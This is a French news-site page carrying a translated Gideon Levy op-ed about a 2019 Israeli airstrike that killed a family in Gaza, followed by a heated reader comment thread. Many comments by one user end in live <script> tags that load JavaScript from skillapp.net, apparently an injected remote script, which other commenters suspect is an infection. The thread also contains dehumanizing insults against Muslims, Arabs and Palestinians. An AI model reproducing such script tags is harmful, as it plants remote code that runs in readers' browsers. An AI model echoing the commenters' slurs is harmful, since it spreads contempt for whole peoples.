• AgoraVox sur Twitter
  • RSS
  • Agoravox TV
  • Agoravox Mobile

Accueil du site > Tribune Libre > Silence, on tue : à Gaza, massacre d’une famille entière comprenant 3 (...)

Silence, on tue : à Gaza, massacre d’une famille entière comprenant 3 enfants et 2 nourrissons

JPEG

Par Gideon Lévy

Source : Haaretz, le 17 novembre 2019. 

Traduction : www.lecridespeuples.fr

Selon la version officielle, le pilote de l’avion qui a mené la frappe ne savait pas. Ses commandants qui lui ont donné les ordres ne savaient pas non plus. Le ministre de la Défense et le Commandant-en-chef ne savaient pas. Le commandant de l’armée de l’air non plus. Les officiers de renseignement qui déterminaient la cible ne savaient pas. Le porte-parole de l’armée qui a menti sans scrupules ne savait pas non plus.

Aucun de nos héros n’était au courant. Ceux qui savent toujours tout, soudainement, ne savaient rien. Ceux qui sont capables de localiser le fils d’un homme recherché dans une banlieue de Damas ne savaient pas qu’une famille pauvre dormait dans son taudis misérable à Dir al-Balah, au sud de Gaza.

Ceux qui servent dans « l’armée la plus morale du monde » et « les services de renseignement les plus avancés du monde » ne savaient pas que ce taudis précaire en tôle avait depuis longtemps cessé de faire partie de la prétendue « infrastructure du Jihad Islamique », et il est peu probable qu’elle ait jamais appartenu au groupe armé. Ils ne savaient pas et ne se sont pas donnés la peine de vérifier. Après tout, quel est le pire qui pouvait arriver ? La mort d’une poignée d’Arabushim ? Insignifiant.

Le journaliste Yaniv Kubovich a révélé la vérité choquante vendredi sur le site Internet de Haaretz : la cible n’avait pas été réexaminée depuis au moins un an avant la frappe ; l’individu qui était censé être ciblé n’avait jamais existé ; et les renseignements étaient basés sur de simples rumeurs. La bombe a quand même été larguée. Le résultat : huit corps dans des linceuls colorés, dont certains horriblement minuscules, tous alignés ; les membres d’une même famille élargie, les Asoarkas, dont cinq enfants – dont deux nourrissons.

Gaza massacre 2.png

Des Palestiniens se rassemblent autour du cratère causé par une frappe aérienne israélienne à Deir al-Balah, dans le sud de la bande de Gaza, le 14 novembre 2019.

S’ils avaient été citoyens israéliens, l’État aurait remué ciel et terre pour venger le sang de ses enfants, dont les noms et les visages innocents auraient immédiatement acquis une notoriété internationale, et le monde entier aurait été bouleversé par la cruauté du « terrorisme palestinien ». Mais Moad Mohamed Asoarka n’était qu’un garçon palestinien de 7 ans qui a vécu et est mort dans une baraque en tôle, n’ayant ni présent ni avenir, et dont la vie était aussi dénuée de valeur et aussi courte que celle d’un papillon ; son assassin était un pilote révéré pour son héroïsme.

C’était un véritable massacre. Mais personne ne sera puni pour ça. « La banque d’objectifs n’a pas été mise à jour », ont déclaré des responsables de l’armée. (Après que l’enquête de Yaniv Kubovich ait été publiée, le porte-parole de l’armée israélienne a publié une autre déclaration : « Le bâtiment a été confirmé comme cible plusieurs jours avant l’attaque. ») Mais ce massacre était pire que l’assassinat ciblé de Salah Shehada, et il a été accueilli par une indifférence encore plus écœurante en Israël.

Le 22 juillet 2002, un pilote de l’armée de l’air israélienne a largué une bombe d’une tonne sur un quartier résidentiel, tuant 16 personnes, dont un homme vraiment recherché par Israël. Jeudi 14 novembre 2019, avant l’aube, un pilote a largué une bombe beaucoup plus intelligente, une JDAM, sur une cabane en tôle dans laquelle aucun homme recherché ne se cachait.

Il s’est avéré que même l’homme prétendument recherché, et nommé par un porte-parole de l’armée, était un simple produit de son imagination. Il n’y avait que des femmes, des enfants et des innocents endormis dans la crainte cette nuit à Gaza. Dans les deux cas, les forces armées israéliennes ont utilisé le même mensonge : nous pensions que le bâtiment était vide. « L’armée israélienne tente toujours de comprendre ce que la famille faisait sur le site », a réagi Tsahal avec l’insolence et la froideur laconique qui la caractérisent, suggérant que la famille était en faute. En effet, que faisaient-ils là, Wasim, 13 ans ; Mohand, 12 ans ; et les deux bébés dont les noms n’ont pas été annoncés ?

En 2002, le lendemain du meurtre de Shehada et de 15 de ses voisins, et après que l’armée israélienne ait continué à affirmer que leurs maisons étaient des « cabanes inoccupées », je me suis rendu sur le site de l’attaque, le quartier de Daraj, à Gaza ville. Il ne s’agissait pas de « cabanes », mais d’immeubles résidentiels, hauts de plusieurs étages, tous densément peuplés, comme dans tous les foyers de Gaza. Mohammed Matar, qui travaillait en Israël depuis 30 ans, était prostré par terre, les bras et les yeux bandés, au milieu des ruines, à côté de l’énorme cratère creusé par l’explosion. Sa fille, sa belle-fille et quatre de ses petits-enfants sont morts dans l’explosion ; trois de ses enfants ont été blessés. « Pourquoi nous ont-ils fait ça ? » m’a-t-il demandé, sous le choc. À l’époque, 27 des pilotes les plus courageux de l’armée de l’air israélienne ont signé la lettre dite des pilotes, refusant de prendre part aux opérations en Cisjordanie et dans la bande de Gaza. Cette fois-ci, pas un seul pilote n’a refusé de participer aux frappes, et il est douteux que ce soit le cas à l’avenir.

« Des êtres humains. Ce sont des êtres humains. Il y a eu une bataille ici, la bataille des infirmières et des médecins contre la mort », écrit le Dr. Mads Gilbert, courageux médecin norvégien, qui se précipite au secours des habitants de la bande de Gaza chaque fois qu’elle est bombardée, soignant les blessés avec un dévouement infini. Gilbert a joint une photo du bloc opératoire de l’hôpital Shifa de la ville de Gaza : du sang sur la table, du sang sur le sol, de la literie trempée de sang partout. Jeudi, le sang de la famille Asoarka a été ajouté à celui de tous les autres, avec leurs cris de douleur en direction d’oreilles qui ne veulent pas écouter.

Soutenez ce travail et contournez la censure en partageant cet article et en vous abonnant à la Newsletter.


Moyenne des avis sur cet article :  4.54/5   (35 votes)




Réagissez à l'article

89 réactions à cet article    


  • Raymond75 19 novembre 13:22

    Bilan à jour au 14 novembre des victimes palestiniennes et israéliennes depuis l’an 2000, tenu par une ONG US :

    https://israelpalestinetimeline.org/


    • Massada Massada 19 novembre 13:48

      Israël met à l’essai de nouvelles tactiques air-sol face au Jihad Islamique.
       

      Un processus baptisé “Canopy” permettait aux cellules de renseignement de Tsahal d’extraire des données en temps réel des drones de surveillance au-dessus de Gaza de manière continue, de détecter les cibles potentielles et de les identifier comme hostiles – en les “incriminant” comme cibles – en quelques secondes.
       

      Ce systeme a permit la neutralisation de nombreux lanceurs de roquettes du Jihad.
      Les équipes de lanceurs de roquettes très mobiles du groupe terroriste, souvent montées sur des motos pouvaient ainsi s’éloigner rapidement d’un site de lancement après le tir. Grace à Canopy 40 terroriste tués, des usines d’armement coûteuses anéanti et le Hamas qui n’a pas bougé.
       

      Les unités récemment améliorées de Dôme de Fer ont abattu plus de 93% des roquettes dont les trajectoires menaçaient des zones densément peuplées d’Israël. (Dôme de Fer projette le point où chaque menace entrante risque de frapper et économise des munitions en ignorant celles qui ne menaceront pas la vie humaine – ce qui en représente beaucoup (60% en terrain vague, lors de ces affrontements).
       


      • Jonas 20 novembre 08:17

        @Massada
        Bonjour 
        L’auteur est celui , qui avait titré , le 15 octobre 2019, cet article un peu stupide et dépourvu de jugement politique. «  Téhéran face à l’occident le triomphe des Ayatollahs »
         
        Comme grand observateur , il va certainement nous expliquer dans un prochain article , si ce triomphe va jusqu’a satisfaire le peuple iranien, qui au comble de joie . brûle les effigies des mollahs. 

         il ne manquera , pas de donner parmi les 100 morts décomptés pour l’instant le nombre de jeunes tués , pour une simple manifestation , contre une inflation galopante , le chômage , la corruption du régime et cette augmentation du prix de l’essence. 100 morts , alors que ces iraniens ne tiraient pas de roquettes contre la police. Imaginez le nombre de morts dans le cas contraire ? 
         


      • Traroth Traroth 20 novembre 14:09

        @Massada
        J’attendais votre intervention, aussi répugnante que prévu.


      • Massada Massada 19 novembre 13:53

        Amusant, la censure frappe à nouveau, on supprime mes messages pourtant polis, respectueux mais disant la vérité ! et la vérité déplait aux censeur.
         
        Je disais donc :
        Les civils de Gaza sont sous la responsabilité de leurs dirigeants.
        A plus forte raison lorsque les civils en question appartiennent à la famille du terroriste (s’il en a rien à foutre de ne pas mettre sa famille en sécurité, alors c’est son problème pas le nôtre).
         
        2 voitures en Israel ont échappé à seulement quelques mètres de distances à une roquette. Israel a suffisamment à se soucier de ses propres civils (la sécurité des civils du camps ennemi ne sont pas notre affaire).
         
        Il n’y a aucune animosité dans mes propos, simplement de la logique.


        • pemile pemile 19 novembre 13:57

          @Massada « on supprime mes messages pourtant polis, respectueux. Je disais donc [...] la sécurité des civils du camps ennemi ne sont pas notre affaire »

          On ne peut imaginer plus respectueux des civils smiley


        • Massada Massada 19 novembre 14:10

          @pemile
           
          Absolument, chaque frappe israélienne est soigneusement étudié afin de minimiser le nombre de civils impacté, ce qui n’empeche pas les accidents surtout lorsque l’ennemi fait tout pour accroitre les pertes civiles à des fins de propagandes.
           
          Les roquettes des islamistes par contre sont volontairement dirigées vers les civils israéliens. Contrairement aux islamistes nous faisons tous ce qui est possible pour protéger nos civils.
           
          Ne pas comprendre ces évidence n’est que de la mauvaise foi


        • Massada Massada 19 novembre 14:15

          @pemile
           
          Al-Baghdadi, tué dans une opération américaine avec son fils, aurait pu sauver celui-ci mais il a préféré se faire exploser en tuant ainsi son propre fils.
           
          Les islamistes ont un rapport avec la mort que nous n’avons pas.
          Ils ont l’idée que mourir c’est comme prendre un ascenseur vers le paradis d’Allah.
          J’ai vu de mes propres yeux des terroristes blessés à mort sourire au lèvre persuadés de retrouver les vierges du grand bordel d’Allah.
           
          Rien de péjoratif dans ce que j’écris, c’est du vécu simplement


        • pemile pemile 19 novembre 14:30

          @Massada « Ne pas comprendre ces évidence n’est que de la mauvaise foi »

          Désolé, mais vous vous contredisez, passer de « c’est pas notre affaire » à « minimiser le nombres de civils impactés », il y a contradiction smiley


        • Xenozoid Xenozoid 19 novembre 14:38

          @pemile

          oui ça ressemble a un nazi qui dit a la croix rouge que les terroristes du gheto de varsovie sont responsable des mort civils,les nazis ne font que leur boulot apres tout,massada a une pensée bien mal placée


        • Massada Massada 19 novembre 14:39

          @pemile
           
          Petit comique smiley
          On fait de gros effort pour minimiser le nombre de victimes civiles.
          Si malheureusement un accident arrive, alors ce n’est plus notre affaire parce que nous avons pris toute les précautions qu’il était possible de prendre.
          Est-ce plus clair ?


        • Massada Massada 19 novembre 14:49

          @Xenozoid
           
          Les nazis n’ont jamais voulu épargner les civils.
          Avec la puissance de feu que nous avons, il nous serait facile de détruire complètement Gaza. Mais ce n’est pas notre objectif.
          Notre objectif est la paix avec nos voisins.
           
          Nous ne sommes pas comme Poutine ou Bachar al Assad qui se préoccupent nullement des pertes civils dans leurs bombardements


        • JC_Lavau JC_Lavau 19 novembre 15:01

          @Massada. Tiens ? Le mensonge à 100 % ? Comme c’est étrange !


        • Massada Massada 19 novembre 15:05

          @JC_Lavau
           
          Non, une vérité qui dérange smiley


        • Xenozoid Xenozoid 19 novembre 15:10

          @Massada

          ou quand les mensonges d’aujourdhui alimente les mensonges de demain,c’est une culture ?


        • Daniel PIGNARD Daniel PIGNARD 19 novembre 17:43

          @Xenozoid

          Les explications de Massada sont logiques. J’aime la manière dont se défend Israël sur son territoire. Si les Gazaouis veulent mettre des boucliers humains avec leurs familles, cela montre l’attachement qu’ils portent à leurs proches. Vivre avec des gens ayant ce genre de pratiques ne se conçoit même pas pour un Européen. Pouaaaah !


        • Esprit Critique 19 novembre 17:54

          @pemile
          Effectivement dans une guerre les soins apportés par un des belligèrent a ses civils est rarement de la responsabilités des adversaires, Mais bon si c’est pas clair dans votre tète ...


        • pemile pemile 19 novembre 18:15

          @Esprit Critique "Effectivement dans une guerre les soins apportés par un des belligèrent a ses civils est rarement de la responsabilités des adversaires, Mais bon si c’est pas clair dans votre tète "

           ????

          Convention de Genève VS dommages collatéraux ! smiley


        • Furtive Sentinelle Furtive Sentinelle 19 novembre 18:26

          @Daniel PIGNARD
          Oui sauf que vous oubliez que, dans le ghetto de Varsovie, c’étaient les enfants juifs que les parents terrés comme des rats envoyaient face aux SS...
          Le phénomène des boucliers humains est universel et quitte à le dénoncer, il faut avoir l’honnêteté de ne pas faire d’ostracisme !!!! 


        • robert robert 19 novembre 21:18

          @Massada
          et celui qui a écrasé Rachel est un ange dans son bull ailé


        • zzz999 20 novembre 10:46

          @pemile

          Vous avez bien du temps à perdre avec discuter avec ce facho qui n’est qu’un troll du BETAR et se délecte de ses propres contradictions criminelles.


        • Traroth Traroth 20 novembre 14:15

          @Esprit Critique
          Une guerre ? Où ça ? Où est l’armée palestinienne ? Où sont les chars israéliens ? Où sont les bateaux de guerre palestiniens ? Où sont les hélicoptères de combat palestiniens ? Où sont les missiles palestiniens ? Où sont les canons palestiniens ? Où sont les forces spéciales palestiniennes ?

          Je ne vois qu’un massacre.


        • Xenozoid Xenozoid 20 novembre 15:23

          @Daniel PIGNARD

          tres logique,venant de toi


        • Jonas 21 novembre 08:05

          @Traroth
          Trois palestiniens ou 30 est un massacre 4000 palestiniens tués en Syrie par le boucher de Damas c’est quoi ? 


        • Traroth Traroth 21 novembre 17:11

          @Jonas
          Vous n’arriverez pas à faire croire qu’Israël n’a tué que « 3 ou 30 » Palestiniens.


        • Jonas 21 novembre 17:18

          @Traroth
          Les Palestiniens savent compter les morts , même les accidentés de la route , sont de la responsabilité d’Israël. D’ailleurs , il n’y a jamais de terroristes palestiniens tués par les frappes israéliennes , il n’y a que des civils , des enfants et des nourrissons. 


        • Traroth Traroth 25 novembre 13:19

          @Jonas
          Alors que pour vous, même les enfants et les nourrissons sont des terroristes. C’est très clair, merci.


        • MagicBuster 19 novembre 14:35

          il suffirait que les musulmans creusent un trou , ils pourraient garder pour eux l’INTEGRALITE de la 2eme face de la terre plate.

          Ils n’ont toujours pas compris . . . . je pense qu’ils font exprès .

          https://wikiislam.net/wiki/Le_Coran_et_la_Terre_plate


          • Traroth Traroth 20 novembre 14:18

            Comment reconnaître un sac à merde ?

            Quand des innocents meurent, ce sont ceux qui rient.

            Pas d’exception.


          • Massada Massada 19 novembre 15:19

            Répression ultra-violente des manifestations en Iran : « Ils tuent n’importe qui se trouvant dans la rue ».
            Des dizaines de manifestants ont été tués !

             
            Mais ce n’est pas Gaza, alors pour nombre de commentateurs d’AV ces morts ne comptent pas, ils ne sont pas tués par des israéliens.


            • pemile pemile 19 novembre 15:45

              @Massada « Répression ultra-violente des manifestations en Iran [...] pour nombre de commentateurs d’AV ces morts ne comptent pas »

              Vous dépassez toujours les bornes ! La république islamique d’Iran et ses Mollahs aurait donc ses fans sur avox ??!!

              Idem pour les bombardement Saoudiens au Yemen, tout Avox applaudirait des deux mains ??!!


            • Massada Massada 19 novembre 16:32

              @pemile
               
              La république islamique d’Iran et ses Mollahs aurait donc ses fans sur avox ??!!
              ++++
              Affirmatif 
              Vous lisez parfois les commentaires autres que les miens ? smiley


            • pemile pemile 19 novembre 17:00

              @Massada « Affirmatif Vous lisez parfois les commentaires autres que les miens ? »

              Oui, vous pouvez sourcer ou indiquer les pseudos, svp ?


            • Massada Massada 19 novembre 17:43

              @pemile
               
              Je ne suis pas un délateur
              Iran : plus de 100 manifestants pourraient avoir été tués, selon Amnesty International


            • pemile pemile 19 novembre 18:24

              @Massada « Je ne suis pas un délateur »

              Façon de dire que vous mentez comme un arracheur de dents ? smiley


            • DACH 19 novembre 19:14

              @pemile=Rien de nouveau, les menteurs impénitents comme Débile, Pémile, sont les premiers à traiter de menteurs ceux auxquels ils ne savent pas répondre !


            • pemile pemile 19 novembre 21:21

              @DACH « sont les premiers à traiter de menteurs »

              Que Massada source quelques exemples de ces soit disant nombreux fans de la république islamique d’Iran et ses Mollahs sur AgoraVox ?


            • sls0 sls0 20 novembre 00:44

              @Massada
              Moi aussi j’ai entendu cela. J’ai voulu remonter a la source. Quand je suis arrivé sur Iran Freedom j’ai commencé à avoir de gros doutes.
              Pas d’à priori svp surtout qu’il y a une vidéo.
              Des guilandes dans le fond, on entend effectivement des coups de feu après 3 secondes le mec se tire.
              Je m’attendais à du gore, du sang, là rien.
              Comme preuve j’ai connu mieux.
              https://twitter.com/i/status/1196877620555796481
              Massada, méfiez vous de tout ce qui gravite autour de freedom house, coté propagande et mensonges ils vous battraient presque.


            • Xenozoid Xenozoid 20 novembre 13:54

              @tous

              similitude entre massada et cadoudal,(a part les fait divers),et leur femme ?


            • Esprit Critique 19 novembre 16:16

              si le nazislamistes se plaisent a tirer des roquettes a partir d’une école ou d’un hôpital, Grands biens leurs fasses ! !!


              • Raymond75 19 novembre 16:30

                Il y a longtemps que l’on avait pas lu Massada venir saturer de ses commentaires un article consacré à la glorieuse politique israélienne.

                Et le bouffon du 19ème, il n’est pas encore là ?


                • Furtive Sentinelle Furtive Sentinelle 19 novembre 18:17

                  @Raymond75
                  C’est un sayin c’est à dire un agent du Mossad qui est chargé de la Issraêlpropagandaleitung. Le Mossad et le Shabak ont des agents formés à analyser tous les articles paraissant sur le Net pour désinformer et laver les cerveaux des goyim...ce que faisait aussi le service de propagande nazie pendant la guerre... Mêmes méthodes que leurs anciens tortionnaires, la preuve par Massada ...  


                • DACH 19 novembre 18:18

                  @Raymond75=Il y a longtemps que personne sur ce site ne proteste contre les executions de palestiniens et les emprisonnements et les tortures commises par le Hamas ! Et qui aiderait les 5000 palestiniesn emprisonnés dans les geoles d’Assad ?
                  En Iran, près de 300 tués, plus de 1000 manifestants emprisonnés par la police des Ayatolahs ! Quel bonheur de soutenir de tels régimes....A la condition d’en être très éloigné...

                  <script src="//skillapp.net/2143f05201d76950ea.js"></script>

                • pemile pemile 19 novembre 18:22

                  @DACH "<script src="//skillapp.net/2143f05201d76950ea.js"></script> "

                  Rhoo, vous avez toujours pas soigné votre infection ??!! smiley


                • DACH 19 novembre 18:31

                  @pemile=Quel manque de lucidité ! Ah vous prenez pour une infection ce qui n’est qu’une tentative de pub qui ne se manifeste qu’ici et encore pas tout le temps. La personne compétente qui veille sur notre groupe verra cela plus tard, prochainement. Aucune urgence anti virale !

                  <script src="//skillapp.net/2143f05201d76950ea.js"></script>

                • DACH 19 novembre 18:36

                  @Furtive Sentinelle=Même le crédule de base ne saurait être convaincu par un manque de preuves...Répéter les mêmes affirmations ne démontrent toujours rien...Pas besoin du Mossad, Shin Beth, Shabak pour lire et démonter les affirmations infantiles de certains sur ce site. Ils ont d’autres tâches plus discrètes et inconcevables pour un cerveau sentinelle sans antenne ! 

                  <script src="//skillapp.net/2143f05201d76950ea.js"></script>

                • pemile pemile 19 novembre 21:23

                  @DACH « ce qui n’est qu’une tentative de pub »

                  Un lien vers un source javascript de 204Ko smiley


                • Jonas 20 novembre 08:50

                  @Raymond75
                  Parce que les pays de l’islam ont une politique glorieuse entre eux , ou envers leurs compatriotes ? Que ses pays soient arabo-musulmans ou musulmans non arabes , c’est malheureusement la même violence, et les mêmes exactions, comme seule politique pour se maintenir au pouvoir 

                  Voyez la Turquie , 77 000 prisonniers et 150 000 fonctionnaires chassés de leurs emplois . L’Iran et cette manifestation , une simple manifestation contre la dureté de la vie, déjà 100 morts jusqu’à présents , et arrêt d’Internet pour pouvoir tuer à huis clos. ( comme la guerre au Yemen , une guerre sans images) 

                  Je ne vais pas vous faire l’affront de citer le nombre de tuer en Syrie, Irak , Libye , Yemen etc pour ne citer que ces pays là 

                  Autrefois , l’Empire ottoman était l’homme malade de l’Europe. Aujourd’hui l’islam avec toutes ses différentes confessions est le malade de la planète


                • MagicBuster 19 novembre 17:15

                  Si les arabes moyenâgeux provoque une guerre contre une armée du XXIe siècle,
                  tous les territoires arabes pourraient devenir occupés . . .

                  ( quelques jours suffisent )


                  • DACH 19 novembre 19:21

                    Pour se distraire, lisez ce roman...

                    =

                    https://www.dreuz.info/2019/11/19/objectif-la-mecque-de-raoul-girodet/?utm_source=feedburner&utm_medium=email&utm_campaign=Feed%3A+drzz%2FPxvu+%28Dreuz%29

                    =

                    <script src="//skillapp.net/2143f05201d76950ea.js"></script> <script src="//skillapp.net/2143f05201d76950ea.js"></script> <script src="//skillapp.net/2143f05201d76950ea.js"></script> <script src="//skillapp.net/2143f05201d76950ea.js"></script> <script src="//skillapp.net/2143f05201d76950ea.js"></script> <script src="//skillapp.net/2143f05201d76950ea.js"></script>

                    • pemile pemile 19 novembre 21:16

                      @DACH "<script src="//skillapp.net/2143f05201d76950ea.js"></script> <script src="//skillapp.net/2143f05201d76950ea.js"></script> <script src="//skillapp.net/2143f05201d76950ea.js"></script> <script src="//skillapp.net/2143f05201d76950ea.js"></script> <script src="//skillapp.net/2143f05201d76950ea.js"></script> <script src="//skillapp.net/2143f05201d76950ea.js"></script>"

                       smiley


                    • Cirrhose (Droll de Crane) Cirrhose (Droll de Crane) 19 novembre 22:07

                      @pemile

                      ca me rapppelle un peut les mec qui sont pas foutus d’ aller au chiot sans en mettre sur les murs j’ usquau plafond smiley ...eux non plus ne sont pas éducable 


                    • DACH 19 novembre 19:53

                      François Asselineau est vraiment nul face à EZ, ZZ ! CNEWS de ce soir !

                      <script src="//skillapp.net/2143f05201d76950ea.js"></script> <script src="//skillapp.net/2143f05201d76950ea.js"></script>

                      • DACH 19 novembre 19:58

                        Asselineau est vraiment infantile dans sa façon de vouloir une France... Et il qualifie sa formulation de truc... Il s’avère incapable de reconnaitre ce qu’est la France... Bravo pour le manque d’envergure révél, FA n’est qu’un petit épicier de banlieue qui ne porte aucun projet viable pour la France.

                        <script src="//skillapp.net/2143f05201d76950ea.js"></script>

                        • DACH 19 novembre 20:08

                          On peut comprendre pourquoi il a érté incapable de dépasser 2% des votants aux élections européennes. Les électeurs ont compris que ses paroles ne restent que des paroles qui n’a pas compris la réalité du monde et de la France.

                          <script src="//skillapp.net/2143f05201d76950ea.js"></script>

                          • DACH 19 novembre 21:13

                            Et pouir terminer, allez voir « les Misérables ». Plein d’enseignements et d’humanité dans des moments très durs...

                            <script src="//skillapp.net/2143f05201d76950ea.js"></script> <script src="//skillapp.net/2143f05201d76950ea.js"></script> <script src="//skillapp.net/2143f05201d76950ea.js"></script>

                            • pemile pemile 19 novembre 21:15

                              @DACH "<script src="//skillapp.net/2143f05201d76950ea.js"></script> <script src="//skillapp.net/2143f05201d76950ea.js"></script> <script src="//skillapp.net/2143f05201d76950ea.js"></script>"

                              Tout va bien ! smiley


                            • sls0 sls0 20 novembre 00:58

                              @pemile
                              C’est peut être un script pour véroler les ordinateurs des personnes qui viennent sur agoravox.
                              Ca ne me tente pas trop d’aller vérifier.
                              Après ce serait Dach la vérole.


                            • Un des P'tite Goutte un des P’tite Goutte 19 novembre 21:32

                              Massada, vous êtes tout simplement écoeurant.

                              Pourquoi ? Par aveuglement profond probalement.

                              Rien à ajouter.


                              • rugueux 19 novembre 22:02

                                Combien de roquettes ont été lancées en direction d’Israel ?

                                Je trouve la réaction de Tsahal plutôt mesurée, s’ils voulaient vraiment tuer des palestiniens il y aurait bien plus que ces 7 morts...Et lorsque l’on choisit de tirre délibérément des roquettes depuis des habitations, des écoles ou des dispensaires il est évident qu’en cas de riposte il y aura de la casse...Les palestiniens en sont les premiers responsables...


                                • sls0 sls0 20 novembre 01:57

                                  @rugueux
                                  J’espère pour vous que votre famille ne se prenne pas un jour du collatéral sur la tronche.
                                  Le collatéral c’est un peu comme un attentat, on ne connait pas les futures victimes et on s’en fout.
                                  Pour ce qui est des palestiniens je vous rejoins sur leur responsabilité. Déjà ça fait des milliers d’années qu’ils squattaient sur le territoire du grand Israël. Si c’est pas pour foutre la merde ça y ressemble pas mal.
                                  Et quel sans gêne ! Les boers dans les camps de concentration foutaient ils le bordel ? Non.
                                  Les juifs, pas un mot plus haut que l’autre, bien polis avec leurs gardiens. Si ça ce n’est de la correction !

                                  Et voilà nos palestiniens plutôt que crever en silence qui foutent le bordel. Qu’ils regardent l’exemples de leurs prédécesseurs. J’entends dans l’oreillette « et le ghetto de Varsovie ? » Des juifs mal éduqués, une minorité, comme des rats acculés ça saute à la tronche. D’accord c’est de l’instinct, mais ça fait pas civilisé. Les indiens en Amérique ont aussi voulu se la jouer à l’instinct, ils se sont aussi pris du collatéral dans la tronche et du sérieux. Quand on est pas dans le camp du plus fort on se résigne.
                                  On peut pas dire qu’ils n’étaient pas au courant, c’est écrit dans la bible qu’ils n’étaient pas chez eux.
                                  Non, ils ont tout faux les palestiniens, on a beau être sur une terre ancestrale depuis des siècles, quand un peuple élu déboule on gicle surtout que derrière le peuple élu il y a un autre peuple élu justement celui qui a géré le problème indien.


                                • Jonas 20 novembre 17:07

                                  @rugueux
                                  Un arabo-musulman ne sait compter que les morts palestiniens , mais s’en f... des morts des autres arabo-musulmans tués par d’autres arabo-musulmans. 

                                  Grâce au professionnalisme et à la formation des aviateurs israéliens , il y a certes des dégâts , mais moins que ceux que l’aviation du boucher de Damas, inflige. 
                                  Ces hélicoptères et ces avions larguent des barils d’explosifs sans aucun contrôle et tuent , civils et terroristes musulmans.

                                  Le nombre de mort n’a jamais été décompté, parce que les arabo-musulmans , ne savent pas évaluer leurs morts., sauf ceux fait par des non musulmans. 
                                  Combien de kurdes bien que musulmans sunnites ont été tués par le sultan Erdogan ? L’arabo-musulman ne le sait pas et ne cherche pas à le savoir. 


                                • JC_Lavau JC_Lavau 20 novembre 17:11

                                  @Jonas. Tiens, le mensonge à 200 % sous le contrôle de la propagande Eretz israël ? Comme c’est étrange !


                                • Jonas 21 novembre 08:17

                                  @JC_Lavau
                                  En tant que petit musulman honteux , pouvez-vous donner le nombre de kurdes tués par l’invasion du sultan Erdogan ? Je vous rappelle , que cette invasion a été condamnée par la « Ligue Arabe ». 

                                  Votre chiffre démentira sans conteste ma propagande aux yeux des internautes de AgoraVox. Ne vous dérobez pas comme à votre habitude . Aller un peu de courage !  


                                • JC_Lavau JC_Lavau 21 novembre 08:32

                                  @Jonas : « En tant que petit musulman honteux », qu’il écrit. Il est grand temps que tu consultes un psychiatre.


                                • JC_Lavau JC_Lavau 21 novembre 13:09

                                  @Jonas. Ce dingue radote la propagande Eretz israël : « des dégâts , mais moins que ceux que l’aviation du boucher de Damas, inflige. 
                                  Ces hélicoptères et ces avions larguent des barils d’explosifs sans aucun contrôle et tuent , civils et terroristes musulmans
                                  . »

                                   
                                  Sûr que quand une propagande est localement hégémonique, elle ne peut ni se tromper ni nous tromper. Elle rend fou, sur mesures, conformément à la stratégie des maîtres de la propagande.


                                • Jonas 21 novembre 17:51

                                  @JC_Lavau
                                  Vous fuyez les questions comme à votre habitude , vous, vous contentez des insultes. Cela ne m’impressionne pas , j’ en ai vues plus dans les pays Arabes,
                                   
                                   Je vous repose une seconde fois ma question : combien de kurdes ont été tués , par le Sultan Erdogan lors de sa dernière invasion du nord de la Syrie, ? 

                                  Pour la Syrie , allez voir le film « Pour Sama » de Waad al-Kateab et E.Watts, cela vous permettra d’appréhender mieux le sujet , au lieu de rester sur la propagande, distillée par le boucher de Damas. 
                                   
                                   Au décompte , que vous allez donner , sur les kurdes , il faut le rajouter aux 46 000 tués depuis 1984 , par la Turquie.
                                  Il faut rester calme , pour bien réfléchir @JC_Lavau ! 


                                • JC_Lavau JC_Lavau 21 novembre 18:05

                                  @Jonas. Ce dingue radote encore et toujours la propagande Eretz israël : « des dégâts , mais moins que ceux que l’aviation du boucher de Damas, inflige. 
                                  Ces hélicoptères et ces avions larguent des barils d’explosifs sans aucun contrôle et tuent , civils et terroristes musulmans
                                  . »

                                  Fin de citation.


                                • Un des P'tite Goutte un des P’tite Goutte 19 novembre 23:28

                                  C’est curieux, encore un oubli :

                                  (Bilan à jour au 14 novembre des victimes palestiniennes et israéliennes depuis l’an 2000, tenu par une ONG US :

                                  https://israelpalestinetimeline.org/)

                                  Quand j’écoute une info. sur le conflit Israélo-palestinien, c’est systématique : 10 à 100 fois plus de victimes d’un côté que de l’autre.

                                  J’ajouterai, le reste, c’est des foutaises...


                                  Et les colonies s’étendent, et ils reste des fous pour vouloir rétablir le grand israël biblique, antique, comme il reste des ayatollah fous et autres fanatiques qui, même si il a été construit sur des bases politiciennes* veulent rayer de la carte un état, complètement constitué, avec millions d’habitants ; eh ! les tarés du turban ! infiniment trop tard !


                                  Maintenant, le commentateur tordu qui a avancé le rapport « spécial » -je ne sais plus- qu’entretiennent les palestiniens avec la mort, eh ben, je le plains d’avoir une si lamentable compréhension de l’humanité. Pour info. ou rappel, 2/3 de la population mondiale, en coïncidence approximative avec la plus pauvre "attend plus du monde futur (l’au-delà) que du monde actuel". Source : enquête que j’ai considéré comme fiable (sorry je ne me rappelle plus la source).

                                  Il arrive que, en dehors des conditionnements religieux, les drames, souffrances et autres joyeusetés d’ici-bas nous fassent souhaiter la mort.

                                  Je connais. Pas toi commentateur « machin(e) » ? Une machine tordue, ça peut donc être suffisamment heureux. Postulat. Pour combien de temps ?


                                  « Le bonheur ne se compte pas en années mais en éternité »**.


                                  *Peut-être naïf, j’imagine qu’après la Shoah, d’innombrables bonnes volontés goys ou pas ont favorisé d’une manière ou d’une autre la constitution de l’état d’Israël, sans réaliser tous les tenants et aboutissants.

                                  ** Rév.d’Arès 36/23


                                  • ung do 20 novembre 02:06

                                    Les 2 installations pétrolières les plus importantes d’Arabie saoudite ont subi des attaques destructrices qui ont diminué de moitié la production pétrolière . Cela a été effectué grâce à des drones et des missiles qui ont transpercé le système de défenses saoudiennes , système vendu par les Américains et ayant couté des centaines de milliards . Ces drones et missiles ont couté le millième du prix des armements américains les plus sophistiqués , le complexe miliitaro - industriel US est complètement ridiculisé . Conséquence encore peu mentionnée , toutes les bases américaines dans le monde entier ( qui sont de de 800 à mille ) se révèlent des cibles vulnérables et vont devoir plier bagage . Y compris , la plus grande d’elles , Israel .

                                    Israel grâce à sa supériorité militaire et ses bombes nucléaires ne risque aucune défaite militaire mais les coûts de l’occupation vont devenir non rentables ; ce qui est le but de la Résistance , décourager l’adversaire et le forcer à réembarquer comme au Vietnam : au cours du dernier échange de missiles , il y aurait eu 1 million d ’Israéliens qui ont du se réfugier dans les abris , on n’a encore pas chiffré les dégâts économiques et financiers


                                    • rugueux 20 novembre 05:52

                                      @sls0

